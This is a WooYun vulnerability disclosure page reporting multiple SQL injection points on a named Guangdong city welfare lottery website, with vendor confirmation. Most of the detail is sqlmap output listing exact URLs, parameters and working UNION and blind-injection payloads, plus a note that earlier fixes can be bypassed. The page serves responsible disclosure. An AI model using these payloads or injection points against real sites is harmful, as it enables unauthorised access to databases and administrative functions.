当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117421

漏洞标题:广东省某市福利彩票发行中心存在多处SQL注入(可绕过)

相关厂商:广东省信息安全测评中心

漏洞作者: 路人甲

提交时间:2015-06-01 18:28

修复时间:2015-07-17 10:14

公开时间:2015-07-17 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-12: 细节向核心白帽子及相关领域专家公开
2015-06-22: 细节向普通白帽子公开
2015-07-02: 细节向实习白帽子公开
2015-07-17: 细节向公众公开

简要描述:

存在多个注入,以前修复的注入可以增加等级绕过!~~~

详细说明:

1、参考
WooYun: 广东省某市福利彩票发行中心存在SQL注入漏洞(已入后台可后台发布中奖号码)
WooYun: 广东省某市福利彩票发行中心存在四处SQL注入漏洞
看了这两个,试着看看有没有可以注入的地方
结果找到了,而且增加level 3就可以对修复的继续注入!~~~
2、注入点1

http://www.czfc.org.cn/kjnum_36x7_mx.asp?krs=2006085


1.jpg


2.jpg


3.jpg


4.jpg


3、注入点2

http://www.czfc.org.cn/kjcx_view.asp (POST)
h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111


参数qh和kjrq都存在注入
--level 3

sqlmap identified the following injection points with a total of 4511 HTTP(s) requests:
---
Place: POST
Parameter: qh
Type: UNION query
Title: Generic UNION query (32) - 115 columns
Payload: h_key=true&nytypeid=ny36x7&qh=-2237' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,CHR(113)&CHR(107)&CHR(98)&CHR(109)&CHR(113)&CHR(120)&CHR(73)&CHR(109)&CHR(99)&CHR(118)&CHR(69)&CHR(73)&CHR(78)&CHR(78)&CHR(74)&CHR(113)&CHR(107)&CHR(118)&CHR(117)&CHR(113),32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 FROM MSysAccessObjects%16&kjrq=1111
Place: POST
Parameter: kjrq
Type: UNION query
Title: Generic UNION query (32) - 115 columns
Payload: h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111' UNION ALL SELECT 32,32,32,CHR(113)&CHR(107)&CHR(98)&CHR(109)&CHR(113)&CHR(102)&CHR(115)&CHR(112)&CHR(110)&CHR(82)&CHR(108)&CHR(99)&CHR(111)&CHR(104)&CHR(74)&CHR(113)&CHR(107)&CHR(118)&CHR(117)&CHR(113),32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


--level 1

sqlmap identified the following injection points with a total of 646 HTTP(s) requests:
---
Place: POST
Parameter: kjrq
Type: UNION query
Title: Generic UNION query (NULL) - 115 columns
Payload: h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(102)&CHR(104)&CHR(113)&CHR(117)&CHR(104)&CHR(70)&CHR(70)&CHR(109)&CHR(81)&CHR(90)&CHR(106)&CHR(81)&CHR(108)&CHR(113)&CHR(103)&CHR(119)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
back-end DBMS: Microsoft Access


4、注入点3

http://www.czfc.org.cn/news/news_show.asp?news_id=897


sqlmap identified the following injection points with a total of 209 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: news_id=IIF(8293=8293,897,1/0)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


5、注入点4

http://www.czfc.org.cn/txxw_contact2.asp?ProductID=2196


sqlmap identified the following injection points with a total of 35 HTTP(s) requests:
---
Place: GET
Parameter: ProductID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ProductID=2196 AND 5522=5522
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: ProductID=-9251 UNION ALL SELECT NULL,NULL,NULL,CHR(113)&CHR(99)&CHR(121)&CHR(97)&CHR(113)&CHR(78)&CHR(120)&CHR(67)&CHR(102)&CHR(113)&CHR(86)&CHR(77)&CHR(82)&CHR(112)&CHR(121)&CHR(113)&CHR(115)&CHR(102)&CHR(99)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


6、注入点5

http://www.czfc.org.cn/gift_search.asp?action=search (POST)
type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1


--level 1

sqlmap identified the following injection points with a total of 655 HTTP(s) requests:
---
Place: POST
Parameter: qh
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=-1521') UNION ALL SELECT NULL,NULL,NULL,CHR(113)&CHR(121)&CHR(108)&CHR(108)&CHR(113)&CHR(76)&CHR(114)&CHR(114)&CHR(109)&CHR(115)&CHR(78)&CHR(113)&CHR(88)&CHR(78)&CHR(69)&CHR(113)&CHR(111)&CHR(99)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&giftNumber=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


--level 3

sqlmap identified the following injection points with a total of 2135 HTTP(s) requests:
---
Place: POST
Parameter: startD
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(112)&CHR(67)&CHR(90)&CHR(104)&CHR(119)&CHR(68)&CHR(65)&CHR(113)&CHR(115)&CHR(97)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&endD=2015-5-28&qh=1&giftNumber=1
Place: POST
Parameter: giftNumber
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1')) UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(114)&CHR(112)&CHR(68)&CHR(75)&CHR(104)&CHR(111)&CHR(111)&CHR(106)&CHR(70)&CHR(81)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
Place: POST
Parameter: endD
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(84)&CHR(89)&CHR(104)&CHR(76)&CHR(105)&CHR(73)&CHR(119)&CHR(121)&CHR(83)&CHR(120)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&qh=1&giftNumber=1
Place: POST
Parameter: qh
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=-6420') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(122)&CHR(119)&CHR(104)&CHR(114)&CHR(120)&CHR(90)&CHR(65)&CHR(87)&CHR(70)&CHR(70)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&giftNumber=1
Place: POST
Parameter: type
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(114)&CHR(109)&CHR(73)&CHR(107)&CHR(68)&CHR(86)&CHR(106)&CHR(75)&CHR(84)&CHR(68)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


7、注入点6

http://www.czfc.org.cn/gift_search.asp?pagen=5&startD=&endD=&qh=&giftNumber=&action=search&type=%27%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17%27%2C+%27%BA%C3%B2%CA36%27%2C+%27%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15%27%2C+%27%BA%C3%B2%CA26%27%2C+%27%CB%AB%C9%AB%C7%F2%27%2C+%27%B8%A3%B2%CA3D%27 (GET)


sqlmap identified the following injection points with a total of 4564 HTTP(s) requests:
---
Place: GET
Parameter: giftNumber
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagen=5&startD=&endD=&qh=&giftNumber=') AND 3416=3416 AND ('StTz' LIKE 'StTz&action=search&type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17', '%BA%C3%B2%CA36', '%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15', '%BA%C3%B2%CA26', '%CB%AB%C9%AB%C7%F2', '%B8%A3%B2%CA3D'
Place: GET
Parameter: qh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagen=5&startD=&endD=&qh=' AND 4177=4177 AND 'THpF' LIKE 'THpF&giftNumber=&action=search&type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17', '%BA%C3%B2%CA36', '%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15', '%BA%C3%B2%CA26', '%CB%AB%C9%AB%C7%F2', '%B8%A3%B2%CA3D'
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


8、注入点7

http://www.czfc.org.cn/displayhtml.asp?act=state (POST)
uid=admin&pwd=123456&CookieDate=0&userhidden=2&comeurl=http://www.czfc.org.cn/flash/menu.swf


sqlmap identified the following injection points with a total of 1127 HTTP(s) requests:
---
Place: POST
Parameter: uid
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: uid=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(105)&CHR(99)&CHR(104)&CHR(113)&CHR(118)&CHR(114)&CHR(80)&CHR(121)&CHR(105)&CHR(75)&CHR(86)&CHR(71)&CHR(110)&CHR(117)&CHR(113)&CHR(121)&CHR(100)&CHR(110)&CHR(113) FROM MSysAccessObjects%16&pwd=123456&CookieDate=0&userhidden=2&comeurl=http://www.czfc.org.cn/flash/menu.swf
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


9、测试了很多,就不继续了,深入的也被大牛深入后台了!~~~具体什么重要信息就不说了!~~~

漏洞证明:

4.jpg

修复方案:

你们知道的!~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-02 10:12

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论